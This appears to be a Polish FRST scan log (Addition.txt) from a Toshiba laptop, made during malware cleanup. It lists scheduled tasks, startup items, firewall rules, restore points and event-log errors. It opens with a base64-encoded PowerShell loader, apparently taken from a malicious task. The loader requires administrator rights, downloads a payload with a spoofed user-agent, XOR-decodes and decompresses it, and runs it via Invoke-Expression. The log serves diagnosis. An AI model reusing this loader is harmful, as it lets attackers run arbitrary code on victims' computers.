CAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA= Task: {DD9F510C-95F4-499A-90C8-BAC5BC372FF4} - System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask => start sppsvc (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) ==================== Skróty ============================= (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) ==================== Załadowane moduły (filtrowane) ============== 2015-12-08 20:25 - 2015-12-08 20:25 - 00061440 _____ () C:\Program Files\CCleaner\lang\lang-1045.dll 2015-07-08 23:18 - 2015-07-08 23:18 - 00794920 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 16.0.0\kpcengine.2.3.dll 2015-12-27 18:39 - 2015-12-15 11:21 - 61562488 _____ () C:\Program Files (x86)\Opera\34.0.2036.42\opera.dll 2015-12-27 18:39 - 2015-12-15 11:21 - 01983096 _____ () C:\Program Files (x86)\Opera\34.0.2036.42\libglesv2.dll 2015-12-27 18:39 - 2015-12-15 11:21 - 00081528 _____ () C:\Program Files (x86)\Opera\34.0.2036.42\libegl.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) ==================== EXE - Powiązania (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) ==================== Hosts - zawartość: =============================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2009-07-14 03:34 - 2016-01-02 21:08 - 00000826 ____A C:\windows\system32\Drivers\etc\hosts ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-1581660641-4088170054-1556520515-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Niagara\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 62.179.1.63 - 62.179.1.62 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == (Obecnie brak automatycznej naprawy dla tej sekcji.) MSCONFIG\startupfolder: C:^Users^Niagara^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^TRDCReminder.lnk => C:\windows\pss\TRDCReminder.lnk.Startup MSCONFIG\startupreg: 00TCrdMain => %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" MSCONFIG\startupreg: Adobe Reader Speed Launcher => "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe" MSCONFIG\startupreg: Bing Bar => "C:\Program Files (x86)\MSN Toolbar\Platform\5.0.1399.0\mswinext.exe" MSCONFIG\startupreg: HSON => %ProgramFiles%\TOSHIBA\TBS\HSON.exe MSCONFIG\startupreg: HWSetup => C:\Program Files\TOSHIBA\Utilities\HWSetup.exe hwSetUP MSCONFIG\startupreg: ITSecMng => %ProgramFiles%\TOSHIBA\Bluetooth Toshiba Stack\ItSecMng.exe /START MSCONFIG\startupreg: KeNotify => C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe MSCONFIG\startupreg: Microsoft Default Manager => "C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe" -resume MSCONFIG\startupreg: NBAgent => "C:\Program Files (x86)\Nero\Nero BackItUp & Burn\Nero BackItUp\NBAgent.exe" /WinStart MSCONFIG\startupreg: RtHDVBg => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /FORPCEE3 MSCONFIG\startupreg: RtHDVCpl => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s MSCONFIG\startupreg: SmartFaceVWatcher => %ProgramFiles%\Toshiba\SmartFaceV\SmartFaceVWatcher.exe MSCONFIG\startupreg: SmoothView => %ProgramFiles%\Toshiba\SmoothView\SmoothView.exe MSCONFIG\startupreg: SVPWUTIL => C:\Program Files (x86)\TOSHIBA\Utilities\SVPWUTIL.exe SVPwUTIL MSCONFIG\startupreg: SynTPEnh => %ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe MSCONFIG\startupreg: Teco => "%ProgramFiles%\TOSHIBA\TECO\Teco.exe" /r MSCONFIG\startupreg: ThpSrv => C:\windows\system32\thpsrv /logon MSCONFIG\startupreg: TOSHIBA Online Product Information => C:\Program Files (x86)\TOSHIBA\TOSHIBA Online Product Information\topi.exe MSCONFIG\startupreg: Toshiba Registration => C:\Program Files\Toshiba\Registration\ToshibaReminder.exe MSCONFIG\startupreg: Toshiba TEMPRO => C:\Program Files (x86)\Toshiba TEMPRO\TemproTray.exe MSCONFIG\startupreg: TosNC => %ProgramFiles%\Toshiba\BulletinBoard\TosNcCore.exe MSCONFIG\startupreg: TosReelTimeMonitor => %ProgramFiles%\TOSHIBA\ReelTime\TosReelTimeMonitor.exe MSCONFIG\startupreg: TosSENotify => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe MSCONFIG\startupreg: TosVolRegulator => C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe MSCONFIG\startupreg: TosWaitSrv => %ProgramFiles%\TOSHIBA\TPHM\TosWaitSrv.exe MSCONFIG\startupreg: TPwrMain => %ProgramFiles%\TOSHIBA\Power Saver\TPwrMain.EXE MSCONFIG\startupreg: TRCMan => C:\Program Files (x86)\TOSHIBA\TRCMan\TRCMan.exe MSCONFIG\startupreg: TSleepSrv => %ProgramFiles(x86)%\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe MSCONFIG\startupreg: TWebCamera => "C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe" autorun ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [{ACC10CEF-F4FB-4D1B-8F3A-2D408057B01E}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [{930BBE62-4371-4288-9F7D-A09C8F2D9B38}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe FirewallRules: [{DDDD4A24-BBB7-4A22-A825-448D17E0DA76}] => (Allow) svchost.exe FirewallRules: [{8441B529-2EBB-4EA4-A502-50CF55A7BC19}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe FirewallRules: [{EAB1400F-D618-404F-99CF-E2849FF3E02F}] => (Allow) C:\Program Files\Common Files\mcafee\mcsvchost\McSvHost.exe FirewallRules: [{7876F5BD-4D5F-48A7-9AAD-7546222CF134}] => (Allow) C:\Program Files\Common Files\mcafee\mcsvchost\McSvHost.exe FirewallRules: [{DB38BB92-6E59-412D-9396-7BA2145FBDD8}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe FirewallRules: [{CBFA66BE-C46C-481B-85DC-69D13CBE235C}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe FirewallRules: [{C2D51251-E059-402A-AB30-E286F485BC11}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{BDC9D196-487E-4154-9809-FB9DF489F8F2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{85EB65C4-5ED0-4114-9BD2-75CF0279D3E1}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{EC96E907-AC82-418D-8368-09AF1D37D08D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{B7674E59-342D-49CD-89A8-E2929E193083}] => (Allow) C:\Users\Niagara\AppData\Local\TNT2\2.0.0.2030\TNT2User.exe FirewallRules: [{E7D8B835-6C4E-4576-BCE7-C68401268768}] => (Allow) C:\Users\Niagara\AppData\Local\TNT2\2.0.0.2030\TNT2User.exe FirewallRules: [{02432778-54BE-4EC2-B472-1CB766564E8F}] => (Allow) C:\Program Files (x86)\simplitec\KMPFaster\PowerSuite.exe FirewallRules: [{50812E83-620E-4997-993B-EA1A403EA7A9}] => (Allow) C:\Program Files (x86)\simplitec\KMPFaster\PowerSuite.exe FirewallRules: [{B3B7BCCA-4399-4141-B0AD-32EFEBD5C68E}] => (Allow) C:\Program Files (x86)\simplitec\KMPFaster\ServiceProvider.exe FirewallRules: [{7AF68500-CBAA-43AF-AB87-EADC63CA4140}] => (Allow) C:\Program Files (x86)\simplitec\KMPFaster\ServiceProvider.exe FirewallRules: [{2006242A-043B-48E2-ADB5-64E135A040F5}] => (Allow) C:\Program Files (x86)\simplitec\KMPFaster\ServiceProvider.exe FirewallRules: [{A0592229-07AD-4C9F-B42C-E90076376BD2}] => (Allow) C:\Program Files (x86)\simplitec\KMPFaster\ServiceProvider.exe ==================== Punkty Przywracania systemu ========================= 27-12-2015 19:03:44 Windows Update 29-12-2015 12:20:34 Windows Update 29-12-2015 14:53:00 Windows Update 29-12-2015 19:26:07 Windows Update 02-01-2016 21:06:29 Removed UpdateAdmin 02-01-2016 21:09:55 Removed Skype Toolbars 02-01-2016 22:25:09 Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 02-01-2016 22:34:31 Installed LibreOffice 5.0.4.2 02-01-2016 22:38:30 Installed LibreOffice 5.0 Help Pack (Polish) ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (01/02/2016 10:38:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: Przetwarzanie wywołania OnIdentity() w obiekcie System Writer przez Usługi kryptograficzne nie powiodło się. Details: AddWin32ServiceFiles: Unable to back up image of service rpcnetp since QueryServiceConfig API failed System Error: Nie można odnaleźć określonego pliku. . Error: (01/02/2016 10:34:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: Przetwarzanie wywołania OnIdentity() w obiekcie System Writer przez Usługi kryptograficzne nie powiodło się. Details: AddWin32ServiceFiles: Unable to back up image of service rpcnetp since QueryServiceConfig API failed System Error: Nie można odnaleźć określonego pliku. . Error: (01/02/2016 10:25:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: Przetwarzanie wywołania OnIdentity() w obiekcie System Writer przez Usługi kryptograficzne nie powiodło się. Details: AddWin32ServiceFiles: Unable to back up image of service rpcnetp since QueryServiceConfig API failed System Error: Nie można odnaleźć określonego pliku. . Error: (01/02/2016 09:09:56 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: Przetwarzanie wywołania OnIdentity() w obiekcie System Writer przez Usługi kryptograficzne nie powiodło się. Details: AddWin32ServiceFiles: Unable to back up image of service rpcnetp since QueryServiceConfig API failed System Error: Nie można odnaleźć określonego pliku. . Error: (01/02/2016 09:06:34 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: Przetwarzanie wywołania OnIdentity() w obiekcie System Writer przez Usługi kryptograficzne nie powiodło się. Details: AddWin32ServiceFiles: Unable to back up image of service rpcnetp since QueryServiceConfig API failed System Error: Nie można odnaleźć określonego pliku. . Error: (12/29/2015 08:41:39 PM) (Source: SideBySide) (EventID: 35) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "WLMFDS,processorArchitecture="AMD64",type="win32",version="1.0.0.1"1". Błąd w pliku manifestu lub w pliku zasad "WLMFDS,processorArchitecture="AMD64",type="win32",version="1.0.0.1"2" w wierszu WLMFDS,processorArchitecture="AMD64",type="win32",version="1.0.0.1"3. Tożsamość składnika znaleziona w manifeście nie odpowiada tożsamości składnika żądanego. Odwołanie to WLMFDS,processorArchitecture="AMD64",type="win32",version="1.0.0.1". Definicja to WLMFDS,processorArchitecture="x86",type="win32",version="1.0.0.1". Użyj narzędzia sxstrace.exe, aby uzyskać szczegółową diagnozę. Error: (12/29/2015 08:41:39 PM) (Source: SideBySide) (EventID: 35) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "WLMFDS,processorArchitecture="AMD64",type="win32",version="1.0.0.1"1". Błąd w pliku manifestu lub w pliku zasad "WLMFDS,processorArchitecture="AMD64",type="win32",version="1.0.0.1"2" w wierszu WLMFDS,processorArchitecture="AMD64",type="win32",version="1.0.0.1"3. Tożsamość składnika znaleziona w manifeście nie odpowiada tożsamości składnika żądanego. Odwołanie to WLMFDS,processorArchitecture="AMD64",type="win32",version="1.0.0.1". Definicja to WLMFDS,processorArchitecture="x86",type="win32",version="1.0.0.1". Użyj narzędzia sxstrace.exe, aby uzyskać szczegółową diagnozę. Error: (12/29/2015 08:41:37 PM) (Source: SideBySide) (EventID: 35) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "WLMFDS,processorArchitecture="AMD64",type="win32",version="1.0.0.1"1". Błąd w pliku manifestu lub w pliku zasad "WLMFDS,processorArchitecture="AMD64",type="win32",version="1.0.0.1"2" w wierszu WLMFDS,processorArchitecture="AMD64",type="win32",version="1.0.0.1"3. Tożsamość składnika znaleziona w manifeście nie odpowiada tożsamości składnika żądanego. Odwołanie to WLMFDS,processorArchitecture="AMD64",type="win32",version="1.0.0.1". Definicja to WLMFDS,processorArchitecture="x86",type="win32",version="1.0.0.1". Użyj narzędzia sxstrace.exe, aby uzyskać szczegółową diagnozę. Error: (12/29/2015 07:26:13 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: Przetwarzanie wywołania OnIdentity() w obiekcie System Writer przez Usługi kryptograficzne nie powiodło się. Details: AddWin32ServiceFiles: Unable to back up image of service rpcnetp since QueryServiceConfig API failed System Error: Nie można odnaleźć określonego pliku. . Error: (12/29/2015 12:20:39 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: Przetwarzanie wywołania OnIdentity() w obiekcie System Writer przez Usługi kryptograficzne nie powiodło się. Details: AddWin32ServiceFiles: Unable to back up image of service rpcnetp since QueryServiceConfig API failed System Error: Nie można odnaleźć określonego pliku. . Dziennik System: ============= Error: (01/02/2016 09:15:15 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: ZARZĄDZANIE NT) Description: Nastąpiło nieoczekiwane zatrzymanie modułu rozszerzalności sieci WLAN. Ścieżka modułu: C:\windows\System32\bcmihvsrv64.dll Error: (01/02/2016 09:15:15 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: ZARZĄDZANIE NT) Description: Nastąpiło nieoczekiwane zatrzymanie modułu rozszerzalności sieci WLAN. Ścieżka modułu: C:\windows\System32\bcmihvsrv64.dll Error: (01/02/2016 09:15:13 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: ZARZĄDZANIE NT) Description: Nastąpiło nieoczekiwane zatrzymanie modułu rozszerzalności sieci WLAN. Ścieżka modułu: C:\windows\System32\bcmihvsrv64.dll Error: (01/02/2016 09:14:55 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Instalator Windows niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 120000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (01/02/2016 09:14:54 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Usługa udostępniania w sieci programu Windows Media Player niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 30000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (01/02/2016 09:14:54 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa Intel(R) Management & Security Application User Notification Service niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. Error: (01/02/2016 09:14:54 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa ConfigFree Service niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. Error: (01/02/2016 09:14:54 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa ConfigFree WiMAX Service niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. Error: (01/02/2016 09:14:54 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Windows Search niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 30000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (01/02/2016 09:14:54 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Windows Live ID Sign-in Assistant niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 10000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. ==================== Statystyki pamięci =========================== Procesor: Intel(R) Core(TM) i7 CPU Q 720 @ 1.60GHz Procent pamięci w użyciu: 59% Całkowita pamięć fizyczna: 4026.67 MB Dostępna pamięć fizyczna: 1615.83 MB Całkowita pamięć wirtualna: 8051.55 MB Dostępna pamięć wirtualna: 5440.68 MB ==================== Dyski ================================ Drive c: (TI30620600A) (Fixed) (Total:228.99 GB) (Free:182.4 GB) NTFS ==>[system z komponentami startowymi (pozyskano odczytując dysk)] Drive e: (Nowy) (Fixed) (Total:100 GB) (Free:99.9 GB) NTFS Drive f: (Nowy) (Fixed) (Total:126.89 GB) (Free:126.8 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 45BE4CB1) Partition 1: (Active) - (Size=1.5 GB) - (Type=27) Partition 2: (Not Active) - (Size=229 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=226.9 GB) - (Type=OF Extended) Partition 4: (Not Active) - (Size=8.4 GB) - (Type=17) ==================== Koniec Addition.txt ============================